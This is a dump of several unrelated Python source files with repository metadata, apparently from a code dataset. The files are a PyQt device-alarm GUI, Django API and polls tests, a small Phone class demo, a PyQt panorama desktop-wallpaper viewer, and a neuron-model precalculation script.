self.Nrows\n loadflag = 1\n except:\n loadflag = 0\n if loadflag == 0:\n # List of devices' server domains.\n self.devdoms = ['r3-319l/dia/tco-01/temperature',\n 'r3-319l/dia/tco-02/temperature',\n 'r3-319l/dia/tco-03/temperature',\n 'r1-101/dia/bpm-01/xmeanpossa']\n\n self.devdesc = ['R3 319 TCO 01 temperature',\n 'R3 319 TCO 02 temperature',\n 'R3 319 TCO 03 temperature',\n 'R1 101 BPM 01 x-pos']\n\n self.devlims = [36,\n 38,\n 40,\n 100]\n\n self.Nrows = 20\n self.reloadflag = 0\n self.maxsize = 0\n self.timerinterval = 30 # seconds\n\n # Construct the toplayout and make it stretchable\n self.toplayout = QtGui.QVBoxLayout(self)\n self.toplayout.addStretch()\n\n # Construct a horizontal layout box for the edit and get all attribute buttons (must be a sublayer of the toplayout)\n self.editgetallwdg = QtGui.QWidget(self)\n self.toplayout.addWidget(self.editgetallwdg)\n self.horizlayout0 = QtGui.QHBoxLayout(self.editgetallwdg)\n\n # Construct the button for setting up a dynamic list of attributes\n self.listbtn = QtGui.QPushButton(\"Edit DynaGUI\")\n self.listbtn.clicked.connect(self.listbtnclicked)\n self.listbtn.setEnabled(True)\n self.horizlayout0.addWidget(self.listbtn)\n try:\n self.doublevalidator = QtGui2.QDoubleValidator(-float('inf'),float('inf'),5)\n except:\n self.doublevalidator = QtGui.QDoubleValidator(-float('inf'),float('inf'),5)\n\n # Now we construct the sublayout which will consist of the dynamically constructed buttons of the lists defined above (in example; list1 or list2)\n self.sublayout = QtGui.QGridLayout()\n self.toplayout.addLayout(self.sublayout)\n\n # Now we construct a groupbox for all the dynamically constructed buttons. Edit its text to whatever is appropriate. Then its added to the sublayout.# Now we construct the sublayout which will consist of the dynamically constructed buttons of the lists defined above (in example; list1 or list2)\n self.groupBox = QtGui.QGroupBox()\n self.sublayout.addWidget(self.groupBox)\n self.sublayout = QtGui.QGridLayout(self.groupBox)\n\n # Construct a simple label widget which in this example has the purpose of displaying various messages to the user (status messages)\n self.bottomlabel = QtGui.QLabel(\"\")\n self.toplayout.addWidget(self.bottomlabel)\n\n # Construct a horizontal layout box for the load and save buttons (must be a sublayer of the toplayout)\n self.loadsavewdg = QtGui.QWidget(self)\n self.toplayout.addWidget(self.loadsavewdg)\n self.horizlayout1 = QtGui.QHBoxLayout(self.loadsavewdg)\n\n # Construct a horiztontal layout box for the Plot and Update buttons (must be a sublayer of the toplayout)\n self.plotupdwdg = QtGui.QWidget(self)\n self.toplayout.addWidget(self.plotupdwdg)\n self.horizlayout2 = QtGui.QHBoxLayout(self.plotupdwdg)\n\n # Construct the load and save buttons, connect them to their functions and add them to their horizontal container\n self.loadbtn = QtGui.QPushButton(\"Load\")\n self.savebtn = QtGui.QPushButton(\"Save\")\n self.selectallbtn = QtGui.QPushButton(\"Select All\")\n self.unselectallbtn = QtGui.QPushButton(\"Unselect All\")\n self.loadbtn.clicked.connect(self.loadbtnclicked)\n self.loadbtn.setShortcut(\"Ctrl+o\")\n self.loadbtn.setToolTip(\"Load a configuration (ctrl+o).\")\n self.savebtn.clicked.connect(self.savebtnclicked)\n self.savebtn.setShortcut(\"Ctrl+s\")\n self.savebtn.setToolTip(\"Save a configuration (ctrl+s).\")\n self.selectallbtn.clicked.connect(self.selectallbtnclicked)\n self.unselectallbtn.clicked.connect(self.unselectallbtnclicked)\n self.horizlayout1.addWidget(self.loadbtn)\n self.horizlayout1.addWidget(self.savebtn)\n self.horizlayout1.addWidget(self.selectallbtn)\n self.horizlayout1.addWidget(self.unselectallbtn)\n\n self.startstopbtn = QtGui.QPushButton(\"Not running. Press to activate.\")\n self.startstopbtn.clicked.connect(self.startstopclicked)\n self.startstopbtn.setStyleSheet('QPushButton {background-color: maroon; color: white}')\n self.toplayout.addWidget(self.startstopbtn)\n # Run the script for generating the dynamical buttons\n self.getallDevs()\n\n self.timer = QtCore.QTimer()\n self.timer.timeout.connect(self.statuscheck)\n\n def selectallbtnclicked(self):\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n item.setChecked(True)\n\n def unselectallbtnclicked(self):\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n item.setChecked(False)\n\n def savebtnclicked(self):\n nameoffile = QtGui.QFileDialog.getSaveFileName(self, 'Save to File')\n if not nameoffile:\n self.bottomlabel.setText(\"Cancelled save configuration.\")\n else:\n file = open(nameoffile, 'w')\n self.toSave = str('IamaDynaGUIalarmFile' + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(self.devdoms) + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(self.devdesc) + '\\n' + \"##IamYourSeparator##\\n\" + '\\n'.join(map(str, self.devlims)) + '\\n' + \"##IamYourSeparator##\\n\" + str(self.Nrows))\n file.write(self.toSave)\n file.close()\n self.bottomlabel.setText(\"Configuration saved to file.\")\n self.bottomlabel.setToolTip(\"Saved configuation to file: \"+nameoffile)\n\n def loadbtnclicked(self):\n nameoffile = QtGui.QFileDialog.getOpenFileName(self, 'Load File')\n if not nameoffile:\n self.bottomlabel.setText(\"Cancelled loading configuration.\")\n else:\n self.loadfile(nameoffile,0)\n\n def loadfile(self,nameoffile,inp2):\n file = open(nameoffile, 'r')\n splitToLoad = file.read()\n splitToLoad = splitToLoad.split(\"##IamYourSeparator##\")\n identifier = splitToLoad[0].split('\\n')\n while(\"\" in identifier): # Get rid of empty strings\n identifier.remove(\"\")\n if identifier[0] == 'IamaDynaGUIalarmFile':\n try:\n if inp2 == 0:\n # Destroy the current buttons.\n self.killdynamicbuttongroup()\n devdoms = splitToLoad[1].split(\"\\n\")\n while(\"\" in devdoms): # Get rid of empty strings\n devdoms.remove(\"\")\n devdesc = splitToLoad[2].split(\"\\n\")\n while(\"\" in devdesc): # Get rid of empty strings\n devdesc.remove(\"\")\n devlims = splitToLoad[3].split(\"\\n\")\n while(\"\" in devlims): # Get rid of empty strings\n devlims.remove(\"\")\n devvlims = [float(i) for i in devlims]\n Nrows = float(splitToLoad[4].split(\"\\n\")[1])\n self.devdoms = devdoms\n self.devdesc = devdesc\n self.devlims = devvlims\n self.Nrows = float(Nrows)\n # All buttons are gone, so lets construct the new buttons.\n self.getallDevs()\n # The layout should be minimal, so make it unrealistically small (x=10, y=10 [px]) and then resize to minimum.\n self.resize(10,10)\n self.resize(self.sizeHint().width(), self.sizeHint().height())\n self.bottomlabel.setToolTip(\"Loaded configuration from file: \"+nameoffile)\n except:\n if inp2 == 0:\n self.bottomlabel.setText(\"Conf. file error: Missing separator(s).\")\n else:\n if inp2 == 0:\n self.bottomlabel.setText(\"Not a DynaGUI alarm file - missing identifier.\")\n\n def killdynamicbuttongroup(self):\n # Destroy / kill all buttons currently constructed in the buttongroup.\n for i in reversed(range(self.sublayout.count())):\n item = self.sublayout.itemAt(i)\n if isinstance(item, QtGui.QWidgetItem):\n item.widget().close()\n for item in self.groupBox.findChildren(QtGui.QLineEdit):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n for item in self.groupBox.findChildren(QtGui.QCheckBox):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n for item in self.groupBox.findChildren(QtGui.QLabel):\n self.sublayout.removeWidget(item)\n item.deleteLater()\n\n\n def getallDevs(self):\n rowcount = -1\n colcount = 0\n\n # Here the construction begins for all the checkboxes, and we make them all belong to the groupbox.\n for numm, index in enumerate(self.devdesc):\n rowcount += 1\n button = QtGui.QCheckBox(index, self.groupBox)\n button.setToolTip(self.devdoms[numm])\n try:\n textbox = QtGui.QLineEdit(str(self.devlims[numm]), self.groupBox)\n except:\n textbox = QtGui.QLineEdit(str(0), self.groupBox)\n self.devlims.append(0)\n textbox.setValidator(self.doublevalidator)\n combobox = QtGui.QComboBox(self.groupBox)\n combobox.addItem(\"<\")\n combobox.addItem(\">\")\n\n textbox.setEnabled(True)\n textbox.textChanged.connect(partial(self.lineeditedited,textbox))\n label = QtGui.QLabel(\"-\",self.groupBox)\n self.sublayout.addWidget(button,rowcount,colcount,1,1)\n self.sublayout.addWidget(label,rowcount,colcount+1,1,1)\n self.sublayout.addWidget(combobox,rowcount,colcount+2,1,1)\n self.sublayout.addWidget(textbox,rowcount,colcount+3,1,1)\n if rowcount == self.Nrows - 1:\n rowcount = -1\n colcount += 4\n\n # Here we construct the buttongroup.\n self.buttonGroup = QtGui.QButtonGroup(self)\n\n # Here we add all buttons to the buttongroup.\n for button in self.groupBox.findChildren(QtGui.QPushButton):\n if self.buttonGroup.id(button) < 0:\n self.buttonGroup.addButton(button)\n\n # Get the statuses\n self.statuscheck()\n\n def lineeditedited(self,lineedit):\n n = -1\n for item in self.groupBox.findChildren(QtGui.QLineEdit):\n n += 1\n if lineedit is item:\n self.devlims[n] = item.text()\n\n def startstopclicked(self):\n if self.timer.isActive():\n self.timer.stop()\n self.startstopbtn.setText(\"Not running. Press to activate.\")\n self.startstopbtn.setStyleSheet('QPushButton {background-color: maroon; color: white}')\n else:\n self.alarmflag = 0\n self.statuscheck()\n self.timer.start(self.timerinterval * 1000)\n self.startstopbtn.setText(\"Running. Press to deactivate.\")\n if platform.system() == \"Linux\":\n self.startstopbtn.setStyleSheet('QPushButton {background-color: lime; color: white}')\n elif platform.system() == \"Darwin\":\n self.startstopbtn.setStyleSheet('QPushButton {background-color: green; color: white}')\n else:\n self.startstopbtn.setStyleSheet('QPushButton {background-color: lime; color: white}')\n\n def clock(self):\n print(\"tic-tac\")\n\n def statuscheck(self):\n checkboxes = self.groupBox.findChildren(QtGui.QCheckBox)\n lineedits = self.groupBox.findChildren(QtGui.QLineEdit)\n labels = self.groupBox.findChildren(QtGui.QLabel)\n combos = self.groupBox.findChildren(QtGui.QComboBox)\n alarmstring = 0\n for ind, item in enumerate(checkboxes):\n splitt = str(item.toolTip()).split(\"/\")\n attr = splitt[len(splitt)-1]\n proxy = str(\"/\".join(splitt[0:len(splitt)-1]))\n\n if self.ctrl_library == \"Tango\":\n prox = [PT.DeviceProxy(str(proxy))]\n for bd in prox:\n val = bd.read_attribute(attr).value\n elif self.ctrl_library == \"Randomizer\":\n val = random.random()\n lorm = str(combos[ind].currentText())\n labels[ind].setText(str(val))\n if item.isChecked():\n if lorm == \"<\":\n if val > float(lineedits[ind].text()):\n if alarmstring == 0:\n alarmstring = str(item.text())\n else:\n alarmstring = str(alarmstring + \" [[slnc 200]] and [[slnc 200]] \" + str(item.text()))\n item.setStyleSheet(\"background-color: red\")\n else:\n if platform.system() == \"Linux\":\n item.setStyleSheet(\"background-color: lime\")\n elif platform.system() == \"Darwin\":\n item.setStyleSheet(\"background-color: green\")\n else:\n item.setStyleSheet('background-color: lime')\n\n elif lorm == \">\":\n if val < float(lineedits[ind].text()):\n if alarmstring == 0:\n alarmstring = str(item.text())\n else:\n alarmstring = str(alarmstring + \" [[slnc 200]] and [[slnc 200]] \" + str(item.text()))\n else:\n if platform.system() == \"Linux\":\n item.setStyleSheet(\"background-color: lime\")\n elif platform.system() == \"Darwin\":\n item.setStyleSheet(\"background-color: green\")\n else:\n item.setStyleSheet('background-color: lime')\n if alarmstring == 0:\n self.bottomlabel.setText(\"All clear.\")\n self.alarmflag = 0\n else:\n if self.alarmflag == 0:\n if platform.system() == \"Linux\":\n os.system('spd-say \"' + str(\"\".join(alarmstring.split(\"[[slnc 200]]\"))) + '[[slnc 200]] in alarm.\"')\n elif platform.system() == \"Darwin\":\n os.system(\"say -v 'karen' \"+ alarmstring + '[[slnc 200]] in alarm.')\n elif platform.system() == \"Windows\":\n print(\"Windows\")\n self.alarmflag = 1\n self.bottomlabel.setText(str(datetime.now().strftime(\"%Y-%b-%d_%H%M%S\")) + \", \" + str(\"\".join(alarmstring.split(\"[[slnc 200]]\")))+\" in alarm.\")\n\n def listbtnclicked(self):\n listGui = listbtnGUI(self)\n listGui.setModal(True)\n listGui.exec_()\n\n if self.reloadflag == 1:\n self.maxsize = 0\n self.killdynamicbuttongroup()\n self.getallDevs()\n\n # The layout should be minimal, so make it unrealistically small (x=10, y=10 [px]) and then resize to minimum.\n self.reloadflag = 0\n\n def closeEvent(self, event):\n self.timer.stop()\n\nclass listbtnGUI(QtGui.QDialog):\n def __init__(self, parent = Dialog):\n super(listbtnGUI, self).__init__(parent)\n self.parent = parent\n self.setWindowTitle(\"Edit DynaGUI Alarms\")\n listgui = QtGui.QFormLayout(self)\n\n devslbl = QtGui.QLabel(\"List of devices' server domains:\")\n self.textboxDevs = QtGui.QPlainTextEdit('\\n'.join(parent.devdoms))\n\n desclbl = QtGui.QLabel(\"List of devices' descriptions:\")\n self.textboxDesc = QtGui.QPlainTextEdit('\\n'.join(parent.devdesc))\n\n rowslbl = QtGui.QLabel(\"Max. number of rows:\")\n self.textboxRows = QtGui.QSpinBox()\n self.textboxRows.setValue(parent.Nrows)\n\n tmrlbl = QtGui.QLabel(\"Alarms timer [s]\")\n self.textboxTmr = QtGui.QSpinBox()\n self.textboxTmr.setValue(parent.timerinterval)\n\n okbtn = QtGui.QPushButton('Ok')\n nobtn = QtGui.QPushButton('Cancel')\n\n\n listgui.addRow(devslbl,desclbl)\n listgui.addRow(self.textboxDevs,self.textboxDesc)\n\n listgui.addRow(rowslbl,self.textboxRows)\n\n listgui.addRow(tmrlbl,self.textboxTmr)\n\n listgui.addRow(okbtn, nobtn)\n okbtn.clicked.connect(self.confirmfunc)\n nobtn.clicked.connect(self.cancelfunc)\n\n\n self.resize(self.sizeHint().width(), self.sizeHint().height())\n\n def confirmfunc(self):\n textDevs = str(self.textboxDevs.toPlainText())\n textDescs = str(self.textboxDesc.toPlainText())\n self.newlistDevs = textDevs.split()\n self.newlistDescs = textDescs.split('\\n')\n\n # Check if all devices have domain, description and limits defined:\n if abs(len(self.newlistDevs)-len(self.newlistDescs)) == 0:\n self.parent.timerinterval = self.textboxTmr.value()\n if self.parent.devdoms != self.newlistDevs or self.parent.devdesc != self.newlistDescs:\n self.parent.devdoms = self.newlistDevs\n self.parent.devdesc = self.newlistDescs\n self.parent.reloadflag = 1\n\n if self.parent.Nrows != self.textboxRows.value():\n self.parent.Nrows = self.textboxRows.value()\n self.parent.reloadflag = 1\n self.close()\n else:\n if platform.system() == \"Linux\":\n os.system('spd-say \"NO NO NO\"')\n elif platform.system() == \"Darwin\":\n os.system(\"say -v 'karen' NO NO NO\")\n elif platform.system() == \"Windows\":\n print(\"Windows\")\n QtGui.QMessageBox.warning(self,\"Error\",\"Number of domains and descriptions must be the same.\")\n\n\n def cancelfunc(self):\n self.close()\n\nif __name__ == '__main__':\n try:\n ctrl_library = sys.argv[1]\n inp = sys.argv[2]\n except:\n inp = 0\n app = QtGui.QApplication(sys.argv)\n goflag = 1\n if ctrl_library == \"Tango\":\n import PyTango as PT\n elif ctrl_library == \"EPICS\":\n print(\"Not yet implemented.\")\n goflag = 0\n elif ctrl_library == \"Randomizer\":\n import random\n else:\n goflag = 0\n if goflag == 1:\n window = Dialog(inp,ctrl_library)\n window.show()\n sys.exit(app.exec_())\n","repo_name":"Chilipp/DynaGUI","sub_path":"dynagui-files/DynaGUI_Alarms.py","file_name":"DynaGUI_Alarms.py","file_ext":"py","file_size_in_byte":19243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"71754022134","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Coverage\n\nfrom product.serializers import CoverageSerializer\n\n\nCOVERAGES_URL = reverse('product:coverage-list')\n\n\nclass PublicCoveragesApiTests(TestCase):\n \"\"\"Test the publicly available Coverages API\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_login_required(self):\n \"\"\"Test that login is required for retrieving Coverages\"\"\"\n res = self.client.get(COVERAGES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateCoveragesApiTests(TestCase):\n \"\"\"Test the authorized user coverages API\"\"\"\n\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n '4086432477',\n 'testpass'\n )\n self.client = APIClient()\n self.client.force_authenticate(self.user)\n\n def test_retrieve_coverages(self):\n \"\"\"Test retrieving coverages\"\"\"\n Coverage.objects.create(user=self.user, name='insurance')\n Coverage.objects.create(user=self.user, name='warranty')\n\n res = self.client.get(COVERAGES_URL)\n\n coverages = Coverage.objects.all().order_by('-name')\n serializer = CoverageSerializer(coverages, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_coverages_limited_to_user(self):\n \"\"\"Test that coverages returned are for the authenticated user\"\"\"\n user2 = get_user_model().objects.create_user(\n '4086432478',\n 'testpass'\n )\n Coverage.objects.create(user=user2, name='insurance')\n coverage = Coverage.objects.create(user=self.user, name='warranty')\n\n res = self.client.get(COVERAGES_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], coverage.name)\n\n def test_create_coverage_successful(self):\n \"\"\"Test creating a new coverage\"\"\"\n payload = {'name': 'Test coverage'}\n self.client.post(COVERAGES_URL, payload)\n\n exists = Coverage.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n self.assertTrue(exists)\n\n def test_create_coverage_invalid(self):\n \"\"\"Test creating a new coverage with invalid payload\"\"\"\n payload = {'name': ''}\n res = self.client.post(COVERAGES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n","repo_name":"greatPurpose/pybackend","sub_path":"app/product/tests/test_coverages_api.py","file_name":"test_coverages_api.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70799510454","text":"# Create your tests here.\nfrom django.test import TestCase\nimport datetime \nfrom django.utils import timezone\nfrom .models import Question\nfrom django.urls import reverse\n\nclass QuestionModelTest(TestCase):\n def test_was_published_recently_with_future_question(self):\n time = timezone.now() + datetime.timedelta(days=30)\n future_question = Question(pub_date=time)\n self.assertIs(future_question.was_published_recently(), False)\n\n def test_was_published_recently_with_old_question(self):\n time = timezone.now() - datetime.timedelta(days=1, seconds=1)\n old_question = Question(pub_date=time)\n self.assertIs(old_question.was_published_recently(), False)\n \n def test_was_published_recently_with_recent_question(self):\n time = timezone.now() - datetime.timedelta(hours=23, minutes=59, seconds=59)\n recent_question = Question(pub_date=time)\n self.assertIs(recent_question.was_published_recently(), True)\n\n#esta funcion externa va a ser utilizada en las funciones de la siguient Test Class\ndef create_question(texto_pregunta, dias):\n time = timezone.now() + datetime.timedelta(days=dias)\n return Question.objects.create(question_text=texto_pregunta, pub_date=time)\n\nclass QuestionIndexViewTests(TestCase):\n def test_no_questions(self):\n #if no questions exist, an appropriate message will be displayed\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertEqual(respuesta.status_code, 200)\n self.assertContains(respuesta, 'No polls are available.')\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [])\n \n def test_past_question(self):\n \"\"\" Questions with a pub_date in the past are displayed on the index page. \"\"\"\n pregunta = create_question(texto_pregunta='Past question', dias=-30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [pregunta])\n\n def test_future_question(self):\n \"\"\" Questions with a pub_date in the future arent displayed on the index page \"\"\"\n create_question(texto_pregunta='Future question', dias=30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertContains(respuesta, 'No polls are available.')\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [])\n\n def test_future_question_and_past_question(self):\n \"\"\" Even if past and future questions exist, just the past ones will be displayed. \"\"\"\n pregunta = create_question(texto_pregunta='Past question', dias=-30)\n create_question(texto_pregunta='Future question', dias=30)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.context['lista_ultimas_preguntas'], [pregunta])\n\n def test_two_past_questions(self):\n \"\"\" The question index page may display multiple questions \"\"\"\n pregunta1 = create_question(texto_pregunta='Past question 1', dias=-30)\n pregunta2 = create_question(texto_pregunta='Past question 2', dias=-5)\n respuesta = self.client.get(reverse('polls:indice'))\n self.assertQuerysetEqual(respuesta.content['lista_ultimas_preguntas'], [pregunta1, pregunta2])\n\n#TESTS PARA EL DETAIL VIEW\nclass QuestionDetailViewTests(TestCase):\n def test_future_question(self):\n \"\"\" the detail view of a question with a pub_date in the future\n returns a 404 not found \"\"\"\n pregunta_futuro = create_question(texto_pregunta='Pregunta futura.', dias=5)\n url = reverse('polls:detalle', args=(pregunta_futuro.id))\n respuesta = self.client.get(url)\n self.assertEqual(respuesta.status_code, 404)\n\n def test_past_question(self):\n \"\"\" \n The detail view of a question with a pub_date in the past\n displays the question text\n \"\"\"\n pregunta_pasado = create_question(texto_pregunta='Pregunta pasado', dias=-5)\n url = reverse('polls:detalle', args=(pregunta_pasado.id))\n respuesta = self.client.get(url)\n self.assertContains(respuesta, pregunta_pasado.question_text)\n ","repo_name":"xpsylon/ProjectTwo","sub_path":"polls/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22865734761","text":"class Phone:\n name = ''\n memory = ''\n ram = 0\n d = ''\n type = ''\n iphone = ''\n\n def __init__(self):\n print(f\"Created objects of phone:\")\n self.name = \"Optimus Primigga\"\n self.memory = '128GB'\n self.ram = 68\n self.d = '156'\n self.type = 'gaming'\n self.iphone = \"!!!!NOT N O T NEVER!!!!\"\n\n\n def ShowOn(self):\n print(f\"name: {self.name} \\nmemory: {self.memory} \\ndiagonal: {self.d} \\ntype: {self.type} \\nRAM: {self.ram} \\nIphone?: {self.iphone}\")\n def __del__(self):\n print(\"Deleted objects of phone\")\n\nif __name__ == '__main__':\n phone = Phone()\n phone.ShowOn()\n del phone","repo_name":"k2supra/Collector_Python","sub_path":"Classes/ex_3/ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74854442611","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWebEngineWidgets import *\n\nimport time\nimport mouse\nimport win32gui as win32\nfrom pynput import mouse as MMFOOD\nfrom multiprocessing import Process\nfrom wallpaper import getShell\nfrom multiprocessing import set_start_method\nfrom bytesp import saveBytesToCode\n\n\nmousedown = False\nmouseDragX = 0\nmouseDragY = 0\nnumMouseDrag = 0\nmx = 0\nmy = 0\nchecking = 0\nbrowser = None\n\nclass MouseMovement:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n\n\ndef hi(s):\n try:\n global desktop\n global checking\n\n checking+=1\n if checking > 15:\n f = open(\"hwnd\", \"r\")\n desktop = int(f.read())\n\n\n if win32.GetForegroundWindow() == desktop:\n global mousedown\n if hasattr(s, \"event_type\"):\n if s.event_type == \"down\" or s.event_type == \"double\":\n mousedown = True\n if s.event_type == \"up\":\n mousedown = False\n global mx\n global my\n mx = 0\n my = 0\n if hasattr(s, \"x\") and mousedown:\n movethething(s)\n except:\n print(\"Variable not defined yet\")\n\n\ndef sendMessage(cx, cy):\n #thing.browser.page().runJavaScript(\"window.alert('i want to run window.movealittlebitsomewhere(\"+str(cx)+\", \"+str(cy)+\")')\")\n global browser\n if browser != None:\n browser.page().runJavaScript(\"window.movealittlebitsomewhere(\"+str(cx)+\", \"+str(cy)+\")\")\n\ndef sendIWANTTOSCROLLLL(dy):\n global browser\n browser.page().runJavaScript(\"window.LEMMESCROLLLLLLL(\"+str(dy)+\")\")\n\ndef on_scroll(x, y, dx, dy):\n #print(dy)\n if dy != 0 and win32.GetForegroundWindow() == desktop and browser!= None:\n sendIWANTTOSCROLLLL(dy)\n\ndef start_scroll_listener():\n listener = MMFOOD.Listener(\n on_scroll=on_scroll)\n listener.start()\n\n\ndef movethething(s):\n global my\n global mx\n x = getattr(s, \"x\")\n y = getattr(s, \"y\")\n if mx == 0 or my == 0:\n mx = x\n my = y\n\n cx = x - mx\n cy = y - my\n sendMessage(cx, cy)\n\n mx = x\n my = y\n\n \n \n\nclass MyWebBrowser(QMainWindow):\n def __init__(self, *args, **kwargs):\n super(MyWebBrowser, self).__init__(*args, **kwargs)\n self.window = QWidget()\n self.window.setWindowTitle(\"Image\")\n self.window.setWindowFlag(Qt.FramelessWindowHint)\n\n self.layout = QVBoxLayout()\n\n self.browser = QWebEngineView()\n\n self.layout.addWidget(self.browser)\n\n self.browser.setUrl(QUrl(\"file:///C:/Users/ms_al/actual%20project/photosphere%20panorama%20street%20view%20360/web/index.html\"))\n\n\n self.window.setLayout(self.layout)\n self.window.show()\n\n start_scroll_listener()\n mouse.hook(hi)\n self.browser.page().runJavaScript(\"window.alert('hi plonkit')\")\n\n\n def browser_self(self):\n return self.browser\n\n \n\n\n\ndef startWebBroswer():\n global browser\n app = QApplication([])\n window = MyWebBrowser()\n browser = window.browser_self()\n app.exec_()\n\ndef sendWindowDesktop():\n time.sleep(2)\n getShell()\n\n\n \n\n#startWebBroswer()\n\nif __name__ == \"__main__\":\n bytes_path = \"web/bytes.js\"\n pano_path = \"web/guyinhouselmao.jpg\"\n\n saveBytesToCode(bytes_path, pano_path)\n\n set_start_method('spawn')\n\n desktop = 0\n\n p_wb = Process(target=startWebBroswer)\n p_window = Process(target=sendWindowDesktop)\n\n p_wb.start()\n p_window.start()\n\n p_wb.join()\n p_window.join()\n","repo_name":"Letti42/geoguessr-live-wallpaper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31748461865","text":"# -*- coding: utf-8 -*-\n\n# script for computing the steady-state, and the first order rate response \n# of an exponential integrate-and-fire neuron subject to white noise input\n# to modulations of the input moments and associated quantities \n# for linear-nonlinear cascade rate models, on a rectangle of baseline \n# input moments (mu, sigma) -- written by Josef Ladenbauer in 2016 \n\n# use the following in IPython for qt plots: %matplotlib qt\n\nfrom params import get_params\nimport cascade_precalc_functions as cf\nimport numpy as np\nfrom collections import OrderedDict\nimport os\n\nfolder = os.path.dirname(os.path.realpath(__file__)) # store files in the same directory as the script itself\noutput_filename = 'EIF_output_for_cascade_noref_speedtest.h5'\nquantities_filename = 'quantities_cascade_noref_speedtest.h5'\n#quantities_filename = 'quantities_cascade_noref_TEMP2.h5' # contains also sigmod dosc fits\nload_EIF_output = False\nload_quantities = False\ncompute_EIF_output = True\ncompute_quantities = True\nsave_rate_mod = False\nsave_EIF_output = True\nsave_quantities = True\nplot_filters = False\nplot_quantities = False\n\n# TODO: recalc output and quantities with 241x46 grid (instead of 261x46) and save: \n# done for Tref=0 (w/o LN_bexdos)\n\n# PREPARING --------------------------------------------------------------------\nparams = get_params()\n\nparams['t_ref'] = 0.0\n\nN_mu_vals = 241 #def.: 261 mu grid points -- from -1.5 to 5 with spacing 0.025 \nN_sigma_vals = 46 #def.: 46 #sigma grid points -- from 0.5 to 5 with spacing 0.1\n\nd_freq = 0.25 # Hz, def.: 0.25\nd_V = 0.01 # mV note: Vr should be a grid point\n\n# For Tref<=1.5 the following limits are reasonable:\nmu_vals = np.linspace(-1.0, 5.0, N_mu_vals) #def.: np.linspace(-1.0, 5.0, N_mu_vals)\nsigma_vals = np.linspace(0.5, 5.0, N_sigma_vals) #def.: np.linspace(0.5, 5.0, N_sigma_vals)\n# EIF_steadystate_and_linresponse results are not faithful for sigma<0.5 and \n# for mu<-1 when sigma is small (sigma=0.5) \n# --> this may be improved by using a slight refinement in the backwards integration:\n# using evaluations of V at k-1/2 instead of k (current version), which would match then \n# with the spectral calculation scheme and (therefore) should work better for smaller mu \n\n# choose background mu and sigma values for filter visualization \n#num_mus_plot = np.min([np.size(mu_vals),8]) \n#mus_plot = np.linspace(mu_vals[0], mu_vals[-1], num_mus_plot) \n#mus_plot = [-0.5, 0.0, 0.5, 1.0, 1.5, 2.0, 2.5, 3.0]\n# for paper: mu-mod [-0.5, 1.5, 3.0], sigma-mod [-0.5, 0.0, 1.5]\nmus_plot = [-0.5, 1.5, 3.0]\n#num_sigmas_plot = np.min([np.size(sigma_vals),4]) \n#sigmas_plot = np.linspace(sigma_vals[0], sigma_vals[-1], num_sigmas_plot) \nsigmas_plot = [1.5, 3.5] #[1.2, 2.4, 3.6] #[0.5, 1.5, 2.5, 3.5] \n# choose background sigma values for quantity visualization \nsigmas_quant_plot = np.arange(0.5, 4.501, 0.2) #[0.5, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0]\n#sigmas_quant_plot = sigma_vals \n\n# some more precalc parameters\nparams['N_procs'] = 10 #multiprocessing.cpu_count() # no of parallel processes (not used in calc_cascade_quantities)\nparams['V_vals'] = np.arange(params['Vlb'],params['Vcut']+d_V/2,d_V)\nparams['freq_vals'] = np.arange(d_freq, 1000+d_freq/2, d_freq)/1000 # kHz\nparams['d_mu'] = 1e-5 # mV/ms\nparams['d_sigma'] = 1e-5 # mV/sqrt(ms)\n\nEIF_output_dict = OrderedDict()\nLN_quantities_dict = OrderedDict()\n\nEIF_output_names = ['r_ss', 'dr_ss_dmu', 'dr_ss_dsigma', 'V_mean_ss',\n 'r1_mumod', 'r1_sigmamod', \n #'peak_abs_r1_mumod', 'f_peak_abs_r1_mumod', #not needed and not impl. a.t.m.\n 'peak_real_r1_mumod', 'f_peak_real_r1_mumod', \n 'peak_imag_r1_mumod', 'f_peak_imag_r1_mumod']\n #'peak_real_r1_sigmamod', 'f_peak_real_r1_sigmamod', #not needed\n 